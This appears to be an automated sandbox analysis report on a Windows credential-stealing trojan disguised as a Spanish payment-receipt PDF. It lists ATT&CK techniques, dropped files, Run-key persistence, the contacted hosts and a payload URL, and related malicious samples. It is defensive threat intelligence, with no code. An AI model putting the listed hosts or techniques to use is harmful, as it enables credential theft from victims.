                            Source: Yara matchFile source: Process Memory Space: Reramvw.exe PID: 7128, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: repeat.exe PID: 7056, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Reramvw.exe PID: 6472, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: repeat.exe PID: 6844, type: MEMORYSTR

                            Mitre Att&ck Matrix

                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                            Windows Management Instrumentation                            		1
                            DLL Side-Loading                            		1
                            DLL Side-Loading                            		1
                            Disable or Modify Tools                            		1
                            OS Credential Dumping                            		1
                            File and Directory Discovery                            		Remote Services11
                            Archive Collected Data                            		3
                            Ingress Tool Transfer                            		Exfiltration Over Other Network MediumAbuse Accessibility Features
                            CredentialsDomainsDefault AccountsScheduled Task/Job11
                            Registry Run Keys / Startup Folder                            		11
                            Process Injection                            		1
                            Deobfuscate/Decode Files or Information                            		1
                            Input Capture                            		24
                            System Information Discovery                            		Remote Desktop Protocol1
                            Data from Local System                            		11
                            Encrypted Channel                            		Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)11
                            Registry Run Keys / Startup Folder                            		11
                            Obfuscated Files or Information                            		1
                            Credentials in Registry                            		1
                            Query Registry                            		SMB/Windows Admin Shares1
                            Email Collection                            		1
                            Non-Standard Port                            		Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                            Software Packing                            		NTDS311
                            Security Software Discovery                            		Distributed Component Object Model1
                            Input Capture                            		4
                            Non-Application Layer Protocol                            		Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                            DLL Side-Loading                            		LSA Secrets1
                            Process Discovery                            		SSHKeylogging15
                            Application Layer Protocol                            		Scheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                            Masquerading                            		Cached Domain Credentials141
                            Virtualization/Sandbox Evasion                            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
                            Virtualization/Sandbox Evasion                            		DCSync1
                            Application Window Discovery                            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                            Process Injection                            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                            Hidden Files and Directories                            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1396479 Sample: JUSTIFICANTE DE PAGO CF.pdf.exe Startdate: 21/02/2024 Architecture: WINDOWS Score: 100 39 mail.wassadadvogados.com.br 2->39 41 www.example.com 2->41 43 2 other IPs or domains 2->43 51 Found malware configuration 2->51 53 Malicious sample detected (through community Yara rule) 2->53 55 Antivirus / Scanner detection for submitted sample 2->55 57 13 other signatures 2->57 7 JUSTIFICANTE DE PAGO CF.pdf.exe 16 5 2->7         started        12 Reramvw.exe 14 5 2->12         started        14 repeat.exe 2->14         started        16 2 other processes 2->16 signatures3 process4 dnsIp5 47 www.example.com 93.184.216.34, 49705, 49707, 49710 EDGECASTUS European Union 7->47 49 qu.ax 45.83.31.187, 443, 49706, 49711 DEDIPATH-LLCUS Netherlands 7->49 37 C:\Users\user\AppData\Roaming\Reramvw.exe, PE32 7->37 dropped 69 Creates multiple autostart registry keys 7->69 71 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 7->71 18 JUSTIFICANTE DE PAGO CF.pdf.exe 1 5 7->18         started        73 Antivirus detection for dropped file 12->73 75 Multi AV Scanner detection for dropped file 12->75 77 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 12->77 23 Reramvw.exe 4 12->23         started        25 Reramvw.exe 12->25         started        79 Machine Learning detection for dropped file 14->79 27 repeat.exe 14->27         started        29 Reramvw.exe 16->29         started        31 repeat.exe 16->31         started        file6 signatures7 process8 dnsIp9 45 wassadadvogados.com.br 191.252.141.106, 49708, 49709, 49720 LocawebServicosdeInternetSABR Brazil 18->45 33 C:\Users\user\AppData\Roaming\...\repeat.exe, PE32 18->33 dropped 35 C:\Users\user\...\repeat.exe:Zone.Identifier, ASCII 18->35 dropped 59 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 18->59 61 Tries to steal Mail credentials (via file / registry access) 18->61 63 Creates multiple autostart registry keys 18->63 65 Hides that the sample has been downloaded from the Internet (zone.identifier) 23->65 67 Tries to harvest and steal browser information (history, passwords, etc) 31->67 file10 signatures11

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            JUSTIFICANTE DE PAGO CF.pdf.exe34%ReversingLabs
                            JUSTIFICANTE DE PAGO CF.pdf.exe100%AviraHEUR/AGEN.1363658
                            JUSTIFICANTE DE PAGO CF.pdf.exe100%Joe Sandbox ML

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\Users\user\AppData\Roaming\repeat\repeat.exe100%AviraHEUR/AGEN.1363658
                            C:\Users\user\AppData\Roaming\Reramvw.exe100%AviraHEUR/AGEN.1363658
                            C:\Users\user\AppData\Roaming\repeat\repeat.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Roaming\Reramvw.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Roaming\Reramvw.exe34%ReversingLabs
                            C:\Users\user\AppData\Roaming\repeat\repeat.exe34%ReversingLabs

                            Unpacked PE Files

                            No Antivirus matches

                            Domains

                            No Antivirus matches

                            URLs

                            SourceDetectionScannerLabelLink
                            https://sectigo.com/CPS00%URL Reputationsafe
                            https://qu.axH0%Avira URL Cloudsafe
                            https://qu.ax/HCHP.pdf0%Avira URL Cloudsafe
                            https://qu.ax0%Avira URL Cloudsafe
                            https://qu.axin0%Avira URL Cloudsafe
                            http://wassadadvogados.com.br0%Avira URL Cloudsafe
                            https://qu.ax4e0%Avira URL Cloudsafe
                            http://mail.wassadadvogados.com.br0%Avira URL Cloudsafe
                            https://qu.axen0%Avira URL Cloudsafe

                            Domains and IPs

                            Contacted Domains

                            NameIPActiveMaliciousAntivirus DetectionReputation
                            wassadadvogados.com.br
                            		191.252.141.106
                            		truefalse
                              		unknown
                              www.example.com
                              		93.184.216.34
                              		truefalse
                                		high
                                qu.ax
                                		45.83.31.187
                                		truefalse
                                  		unknown
                                  mail.wassadadvogados.com.br
                                  		unknown
                                  		unknowntrue
                                    		unknown

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    https://qu.ax/HCHP.pdffalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.example.com/recepticle.aspxfalse
                                      		high

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://mail.wassadadvogados.com.brJUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3214735733.0000000003093000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3214735733.0000000002EE6000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2331974047.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2331974047.0000000003326000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000008.00000002.3213952954.00000000032A3000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000008.00000002.3213952954.00000000030F6000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 0000000A.00000002.3215330801.0000000002F47000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 0000000A.00000002.3215330801.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000C.00000002.3213471421.0000000003213000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000C.00000002.3213471421.0000000003066000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://sectigo.com/CPS0JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3206577989.00000000010DB000.00000004.00000020.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3206577989.00000000010C3000.00000004.00000020.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3214735733.0000000003093000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3214735733.0000000002EE6000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3253942255.000000000636C000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2327172067.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2331974047.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2342786428.0000000006790000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2331974047.0000000003326000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000008.00000002.3256972001.00000000065D5000.00000004.00000020.00020000.00000000.sdmp, repeat.exe, 00000008.00000002.3213952954.00000000032A3000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000008.00000002.3206793882.00000000012B7000.00000004.00000020.00020000.00000000.sdmp, repeat.exe, 00000008.00000002.3213952954.0000000003100000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 0000000A.00000002.3248921386.0000000006252000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 0000000A.00000002.3215330801.0000000002F47000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 0000000A.00000002.3215330801.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000C.00000002.3213471421.0000000003213000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000C.00000002.3246417597.00000000068C2000.00000004.00000020.00020000.00000000.sdmp, repeat.exe, 0000000C.00000002.3213471421.0000000003066000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://github.com/mgravell/protobuf-netiJUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992695119.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992695119.00000000040A9000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1996305112.00000000067C0000.00000004.08000000.00040000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992000502.000000000318D000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000003.00000002.2152875189.0000000002B0D000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000007.00000002.2233090518.00000000029FD000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000009.00000002.2328135287.00000000025FD000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000B.00000002.2408937601.000000000271D000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://qu.axenrepeat.exe, 00000007.00000002.2233090518.000000000293F000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://stackoverflow.com/q/14436606/23354repeat.exe, 0000000B.00000002.2408937601.000000000271D000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://account.dyn.com/JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992695119.00000000043C3000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992000502.000000000318D000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000003.00000002.2152875189.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2326420531.0000000000402000.00000040.00000400.00020000.00000000.sdmp, repeat.exe, 00000007.00000002.2233090518.0000000002AC0000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000009.00000002.2328135287.00000000026C0000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000B.00000002.2408937601.00000000027E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://github.com/mgravell/protobuf-netJJUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992695119.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992695119.00000000040A9000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1996305112.00000000067C0000.00000004.08000000.00040000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992000502.000000000318D000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000003.00000002.2152875189.0000000002B0D000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000007.00000002.2233090518.00000000029FD000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000009.00000002.2328135287.00000000025FD000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000B.00000002.2408937601.000000000271D000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://qu.axinReramvw.exe, 00000003.00000002.2152875189.0000000002A4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://stackoverflow.com/q/11564914/23354;JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992695119.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992695119.00000000040A9000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1996305112.00000000067C0000.00000004.08000000.00040000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992000502.000000000318D000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000003.00000002.2152875189.0000000002B0D000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000007.00000002.2233090518.00000000029FD000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000009.00000002.2328135287.00000000025FD000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000B.00000002.2408937601.000000000271D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://stackoverflow.com/q/2152978/23354JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992695119.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992695119.00000000040A9000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1996305112.00000000067C0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                  		high
                                                  https://qu.axHrepeat.exe, 0000000B.00000002.2408937601.000000000265F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://wassadadvogados.com.brJUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3214735733.0000000003093000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3214735733.0000000002EE6000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2331974047.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2331974047.0000000003326000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000008.00000002.3213952954.00000000032A3000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000008.00000002.3213952954.00000000030F6000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 0000000A.00000002.3215330801.0000000002F47000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 0000000A.00000002.3215330801.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000C.00000002.3213471421.0000000003213000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000C.00000002.3213471421.0000000003066000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://github.com/mgravell/protobuf-netJUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992695119.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992695119.00000000040A9000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1996305112.00000000067C0000.00000004.08000000.00040000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992000502.000000000318D000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000003.00000002.2152875189.0000000002B0D000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000007.00000002.2233090518.00000000029FD000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000009.00000002.2328135287.00000000025FD000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000B.00000002.2408937601.000000000271D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://www.iana.org/domains/exampleJUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992000502.00000000030E5000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000003.00000002.2152875189.0000000002A65000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000007.00000002.2233090518.0000000002955000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000009.00000002.2328135287.0000000002555000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000B.00000002.2408937601.0000000002675000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://qu.axJUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992000502.00000000030CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameJUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992000502.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000003.00000002.2152875189.0000000002A21000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000007.00000002.2233090518.0000000002911000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000009.00000002.2328135287.000000000251B000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000B.00000002.2408937601.000000000263B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://qu.ax4eReramvw.exe, 00000009.00000002.2328135287.000000000253F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown

                                                        World Map of Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public IPs

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        93.184.216.34
                                                        		www.example.comEuropean Union
                                                        		15133EDGECASTUSfalse
                                                        45.83.31.187
                                                        		qu.axNetherlands
                                                        		35913DEDIPATH-LLCUSfalse
                                                        191.252.141.106
                                                        		wassadadvogados.com.brBrazil
                                                        		27715LocawebServicosdeInternetSABRfalse

                                                        General Information

                                                        Joe Sandbox version:40.0.0 Tourmaline
                                                        Analysis ID:1396479
                                                        Start date and time:2024-02-21 21:08:04 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 9m 17s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:14
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:JUSTIFICANTE DE PAGO CF.pdf.exe
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.evad.winEXE@17/7@3/3
                                                        EGA Information:
                                                        • Successful, ratio: 100%
                                                        HCA Information:
                                                        • Successful, ratio: 97%
                                                        • Number of executed functions: 235
                                                        • Number of non-executed functions: 2
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe

                                                        Warnings

                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                        • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                        • VT rate limit hit for: JUSTIFICANTE DE PAGO CF.pdf.exe

                                                        Simulations

                                                        Behavior and APIs

                                                        TimeTypeDescription
                                                        21:08:47API Interceptor96x Sleep call for process: JUSTIFICANTE DE PAGO CF.pdf.exe modified
                                                        21:08:53AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Reramvw C:\Users\user\AppData\Roaming\Reramvw.exe
                                                        21:09:02AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run repeat C:\Users\user\AppData\Roaming\repeat\repeat.exe
                                                        21:09:03API Interceptor158x Sleep call for process: Reramvw.exe modified
                                                        21:09:11AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Reramvw C:\Users\user\AppData\Roaming\Reramvw.exe
                                                        21:09:12API Interceptor141x Sleep call for process: repeat.exe modified
                                                        21:09:20AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run repeat C:\Users\user\AppData\Roaming\repeat\repeat.exe

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        93.184.216.34BL-SHIPPING INVOICE.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                        • www.example.com/recepticle.aspx
                                                        PN MT9162AN1.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                        • www.example.com/recepticle.aspx
                                                        Lnezwqkj.exeGet hashmaliciousPureLog StealerBrowse
                                                        • www.example.com/recepticle.aspx
                                                        Product List.PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                        • www.example.com/recepticle.aspx
                                                        RFQ List 202402218.pif.exeGet hashmaliciousPureLog StealerBrowse
                                                        • www.example.com/recepticle.aspx
                                                        Invoice and delivery order.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                        • www.example.com/recepticle.aspx
                                                        NEW ORDER.pif.exeGet hashmaliciousPureLog StealerBrowse
                                                        • www.example.com/recepticle.aspx
                                                        Product List.PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                        • www.example.com/recepticle.aspx
                                                        RFQ.scr.exeGet hashmaliciousUnknownBrowse
                                                        • www.example.com/recepticle.aspx
                                                        Bqzuwuubie.exeGet hashmaliciousPureLog StealerBrowse
                                                        • www.example.com/recepticle.aspx
                                                        45.83.31.1874323432-3434-04T142248.263.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                          191.252.141.106Invoice and delivery order.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                            P000022633.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                              New Order________xls.xlsmGet hashmaliciousUnknownBrowse
                                                                New Order________xls.xlsmGet hashmaliciousUnknownBrowse
                                                                  Order Previews_____________pdf.exeGet hashmaliciousUnknownBrowse
                                                                    Order Previews_____________pdf.exeGet hashmaliciousUnknownBrowse
                                                                      Orden de compra____________pdf.exeGet hashmaliciousUnknownBrowse
                                                                        Orden de compra____________pdf.exeGet hashmaliciousUnknownBrowse
                                                                          Documento de despacho__xls.exeGet hashmaliciousUnknownBrowse
                                                                            Documento de despacho__xls.exeGet hashmaliciousUnknownBrowse

                                                                              Domains

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              wassadadvogados.com.brNew Order________xls.xlsmGet hashmaliciousUnknownBrowse
                                                                              • 191.252.141.106
                                                                              New Order________xls.xlsmGet hashmaliciousUnknownBrowse
                                                                              • 191.252.141.106
                                                                              Order Previews_____________pdf.exeGet hashmaliciousUnknownBrowse
                                                                              • 191.252.141.106
                                                                              Order Previews_____________pdf.exeGet hashmaliciousUnknownBrowse
                                                                              • 191.252.141.106
                                                                              Orden de compra____________pdf.exeGet hashmaliciousUnknownBrowse
                                                                              • 191.252.141.106
                                                                              Orden de compra____________pdf.exeGet hashmaliciousUnknownBrowse
                                                                              • 191.252.141.106
                                                                              Documento de despacho__xls.exeGet hashmaliciousUnknownBrowse
                                                                              • 191.252.141.106
                                                                              Documento de despacho__xls.exeGet hashmaliciousUnknownBrowse
                                                                              • 191.252.141.106
                                                                              www.example.comBL-SHIPPING INVOICE.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                              • 93.184.216.34
                                                                              PN MT9162AN1.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                              • 93.184.216.34
                                                                              Lnezwqkj.exeGet hashmaliciousPureLog StealerBrowse
                                                                              • 93.184.216.34
                                                                              Product List.PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                              • 93.184.216.34
                                                                              RFQ List 202402218.pif.exeGet hashmaliciousPureLog StealerBrowse
                                                                              • 93.184.216.34
                                                                              Invoice and delivery order.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                              • 93.184.216.34
                                                                              NEW ORDER.pif.exeGet hashmaliciousPureLog StealerBrowse
                                                                              • 93.184.216.34
                                                                              Product List.PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                              • 93.184.216.34
                                                                              RFQ.scr.exeGet hashmaliciousUnknownBrowse
                                                                              • 93.184.216.34
                                                                              Bqzuwuubie.exeGet hashmaliciousPureLog StealerBrowse
                                                                              • 93.184.216.34
                                                                              qu.axtransfer - 9783423-52323-248.263.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                              • 207.32.217.188
                                                                              Factura para el pago 07848956897.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                              • 207.32.217.188
                                                                              Factura-077865676347.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                              • 205.185.124.198
                                                                              Facturas 768912567845.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                              • 205.185.124.198
                                                                              pago-02-04T142248.263.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                              • 142.202.240.89
                                                                              4323432-3434-04T142248.263.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                              • 45.83.31.187
                                                                              657894-02-04T142248.263.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                              • 209.141.48.188
                                                                              transfer - 7678-7689926398.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                              • 66.179.253.177
                                                                              Factura para el pago 945347687788.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                              • 5.161.201.36
                                                                              Transfer-Factura-6556542248.263.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                              • 82.165.215.221

                                                                              ASNs

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              DEDIPATH-LLCUS8holJWXFZe.exeGet hashmaliciousGlupteba, LummaC Stealer, SmokeLoader, StealcBrowse
                                                                              • 45.10.154.155
                                                                              Noua lista de comenzi.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                              • 185.255.114.80
                                                                              4323432-3434-04T142248.263.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                              • 45.83.31.187
                                                                              Jj7MASU4Xd.elfGet hashmaliciousMiraiBrowse
                                                                              • 208.91.107.83
